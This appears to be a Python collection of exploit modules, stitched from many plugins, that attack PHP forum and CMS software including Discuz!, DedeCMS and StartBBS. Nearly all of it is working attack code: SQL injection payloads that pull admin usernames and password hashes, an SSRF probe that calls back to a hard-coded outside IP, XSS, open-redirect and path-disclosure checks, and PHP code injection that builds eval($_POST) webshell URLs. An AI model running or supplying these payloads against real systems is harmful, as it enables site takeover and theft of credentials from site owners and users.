def exploit(url):
headers = {
"User-Agent":
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
}
payloads = [
"/uc_server/control/admin/db.php",
"/source/plugin/myrepeats/table/table_myrepeats.php",
"/install/include/install_lang.php"
]
try:
for payload in payloads:
vulnurl = url + payload
req = requests.get(vulnurl,
headers=headers,
timeout=10,
verify=False)
pattern = re.search(
'Fatal error.* in <b>([^<]+)</b> on line <b>(\d+)</b>',
req.text)
if pattern:
logger.success("[+]存在Discuz! X2.5 物理路径泄露漏洞...(低危)\tpayload: " +
vulnurl + "\tGet物理路径: " + pattern.group(1))
return vulnurl
except:
logger.error("[-] " + vulnurl + "====>连接超时")
def exploit(url):
headers = {
"User-Agent":
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50",
}
time_stamp = time.mktime(datetime.datetime.now().timetuple())
m = hashlib.md5(str(time_stamp).encode(encoding='utf-8'))
md5_str = m.hexdigest()
payload = "/forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]http://45.76.158.91:6868/" + md5_str + ".jpg[/img]&formhash=09cec465"
vulnurl = url + payload
req = requests.get(vulnurl, headers=headers, timeout=10)
eye_url = "http://45.76.158.91/web.log"
time.sleep(6)
reqr = requests.get(eye_url, timeout=10)
if md5_str in reqr.text:
logger.success(
"[+]存在discuz论坛forum.php参数message SSRF漏洞...(中危)\tpayload: " +
vulnurl)
return vulnurl
def down_plugin_dirs():
"""
获取远程插件目录
:return:
"""
r = requests.get(base_url + "plugins")
r.close()
j = json.loads(r.text)
for i in j:
plugin_dirs.append(i["path"])
def exploit(URL):
url = URL + "/index.php/module/aciton/param1/${@phpinfo()}"
logger.process("Requesting target site")
r = requests.get(url, timeout=5)
r.close()
if "<title>phpinfo()</title>" in r.text:
logger.success("Exploitable!")
logger.success("Phpinfo: %s" % url)
url = url.replace("@phpinfo()", "@print(eval($_POST[chu]))")
logger.success("Webshell: %s" % url)
return url
def exploit(URL):
url = URL + "/static/image/common/flvplayer.swf?file=1.flv&" \
"linkfromdisplay=true&link=javascript:alert(1);"
logger.process("Requesting target site")
r = requests.get(url, timeout=5)
r.close()
if hashlib.md5(
r.content).hexdigest() == "7d675405ff7c94fa899784b7ccae68d3":
logger.success("Exploitable!")
logger.success(url)
return url
def down_single_dir(plugin_dir):
"""
下载单个目录插件列表
:param plugin_dir: list, 插件目录
"""
remote_plugins = []
r = requests.get(base_url + plugin_dir)
r.close()
j = json.loads(r.text)
for i in j:
remote_plugins.append(i["path"])
return remote_plugins
def down_single_plugin(plugin):
"""
下载单个插件
:return:
"""
base_url = "https://xxx.com/"
r = requests.get(base_url + plugin)
r.close()
j = json.loads(r.text)
data = binascii.a2b_base64(j["content"])
with open(plugin, "w") as f:
f.write(data)
def get_hash(url):
r = requests.get(url)
r.close()
try:
result = re.search(r"Duplicate entry \'(.*?)' for key",
r.content).group(1)
username = result.split("|")[1]
password = result.split("|")[2]
return (username, password)
except:
logger.error("Finish! Can't get hash!\nBut you can try it by hand!\n")
def exploit(URL):
url = URL + r"/?s=\\x3c\\x2f\\x74\\x69\\x74\\x6c\\x65\\x3e\\x3c\\x73" \
r"\\x63\\x72\\x69\\x70\\x74\\x3e\\x61\\x6c\\x65\\x72\\x74" \
r"\\x28\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74\\x2e\\x64" \
r"\\x6f\\x6d\\x61\\x69\\x6e\\x29\\x3c\\x2f\\x73\\x63\\x72" \
r"\\x69\\x70\\x74\\x3e"
logger.process("Requesting target site")
r = requests.get(url, timeout=5)
r.close()
if "</title><script>alert(document.domain)</script>" in r.text:
logger.success("Exploitable!")
logger.success(url)
return url
def exploit(URL, Cookie):
logger.process("Requesting " + URL)
url = URL + "/?m=message&a=show&uid=%27)%20union%20select%20concat(0x686" \
"16e64736f6d65636875,user_name,0x7e7e7e,password,0x68616e647" \
"36f6d65636875)%20from%20et_users%20limit%201,1%23"
r = requests.get(url=url, cookies=Cookie, timeout=5)
r.close()
if "handsomechu" in r.text:
logger.success("Exploitable!")
handsomechu = r.text.split("handsomechu")[1].split("~~~")
username, password = handsomechu
logger.success("Username: %s" % username)
logger.success("Hash: %s" % password)
return "%s: %s|%s" % (URL, username, password)
def exploit(URL):
url = URL + "/index.php/home/search?q=1'union select 1,2,3,4,concat" \
"(0x6368756973686572657e7e7e,username,0x7e,password,0x7" \
"e7e7e),6,7,8,9,0,1,2,3,4,5,6,7 from stb_users limit 1-" \
"- &sitesearch=http://127.0.0.1/startbbs/"
logger.process("Requesting target site")
r = requests.get(url, timeout=5)
r.close()
if "chuishere" in r.text:
logger.success("Exploitable!")
username, md5 = r.text.split("~~~")[1].split("~")
logger.success("Username: %s" % username)
logger.success("Hash: %s" % md5)
return "%s: %s|%s" % (URL, username, md5)
def exploit(url):
headers = {
"User-Agent":
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
}
payload = "/plugin.php?id=nds_up_ques:nds_ques_viewanswer&srchtxt=1&orderby=dateline/**/And/**/1=(UpdateXml(1,ConCat(0x7e,Md5(1234)),1))--"
vulnurl = url + payload
try:
req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
if r"81dc9bdb52d04dc20036dbd8313ed05" in req.text:
logger.success("[+]存在discuz问卷调查参数orderby注入漏洞...(高危)\tpayload: " +
vulnurl)
return vulnurl
except:
logger.error("[-] " + vulnurl + "====>连接超时")
pass
def exploit(url):
headers = {
"User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
}
payload = "/data/mysql_error_trace.inc"
vulnurl = url + payload
try:
req = requests.get(vulnurl, headers=headers, timeout=10)
req.close()
if r"<?php exit()" in req.content:
logger.success("[+]存在dedecms trace爆路径漏洞...(信息)\tpayload: "+vulnurl)
return vulnurl
except:
logger.error("[-] "+vulnurl+"====>连接超时")
pass
def exploit(URL):
urls = [
URL + "/index.php/search.html?keyword=%24%7B%40phpinfo%28%29%7D",
URL + "/search.html?keyword=%24%7B%40phpinfo%28%29%7D"
]
for i, url in zip(range(1, 3), urls):
logger.process("Testing URL %d..." % i)
r = requests.get(url, timeout=5)
r.close()
if "<title>phpinfo()</title>" in r.text:
logger.success("Exploitable!")
logger.success("Phpinfo: %s" % url)
url = url.replace("%24%7B%40phpinfo%28%29%7D",
"%24%7B%40eval(%24_POST%5B'chu'%5D)%7D")
logger.success("WebShell: %s" % url)
return url
def exploit(url):
headers = {
"User-Agent":
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
}
payload = "/plus/download.php?open=1&link=aHR0cHM6Ly93d3cuYmFpZHUuY29t"
vulnurl = url + payload
try:
req = requests.get(vulnurl, headers=headers, timeout=10)
req.close()
if r"www.baidu.com" in req.content:
logger.success("[+]存在dedecms download.php重定向漏洞...(低危)\tpayload: " +
vulnurl)
return vulnurl
except:
logger.error("[-] " + vulnurl + "====>连接超时")
pass
def exploit(url):
headers = {
"User-Agent":
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
}
payload = "/plus/search.php?keyword=test&typeArr[%20uNion%20]=a"
vulnurl = url + payload
try:
req = requests.get(vulnurl, headers=headers, timeout=10)
req.close()
if r"Error infos" in req.content and r"Error sql" in req.content:
logger.success(
"[+]存在dedecms search.php SQL注入漏洞...(高危)\tpayload: " + vulnurl)
return vulnurl
except:
logger.error("[-] " + vulnurl + "====>连接超时")
pass
def exploit(url):
headers = {
"User-Agent":
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
}
payload = "/data/admin/ver.txt"
vulnurl = url + payload
try:
req = requests.get(vulnurl, headers=headers, timeout=10)
req.close()
m = re.search("^(\d+)$", req.content)
if m:
logger.success("[+]探测到dedecms版本...(敏感信息)\t时间戳: %s, 版本信息: %s" %
(m.group(1), check_ver(m.group(1))))
return vulnurl
except:
logger.error("[-] " + vulnurl + "====>连接超时")
pass
def exploit(url):
headers = {
"User-Agent":
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
}
payload = "/plus/recommend.php?aid=1&_FILES[type][name]&_FILES[type][size]&_FILES[type][type]&_FILES[type][tmp_name]=aa%5c%27AnD+ChAr(@`%27`)+/*!50000Union*/+/*!50000SeLect*/+1,2,3,md5(1234),5,6,7,8,9%20FrOm%20`%23@__admin`%23"
vulnurl = url + payload
try:
req = requests.get(vulnurl, headers=headers, timeout=10)
req.close()
if r"81dc9bdb52d04dc20036dbd8313ed055" in req.content:
logger.success(
"[+]存在dedecms recommend.php SQL注入漏洞...(高危)\tpayload: " +
vulnurl)
return vulnurl
except:
logger.error("[-] " + vulnurl + "====>连接超时")
pass
def verify(URL):
r = requests.get(URL +
"/plus/search.php?keyword=as&typeArr[%20uNion%20]=a")
r.close()
if "Request Error step 1" in r.content:
logger.success("Step 1: Exploitable!")
result = get_hash(
URL +
"/plus/search.php?keyword=as&typeArr[111%3D@`\\\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\\\'`+]=a"
)
return result
elif "Request Error step 2" in r.content:
logger.success("Step 2: Exploitable!")
result = get_hash(
URL +
"/plus/search.php?keyword=as&typeArr[111%3D@`\\\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\\\'`+]=a"
)
return result
else:
logger.error("It's not exploitable!")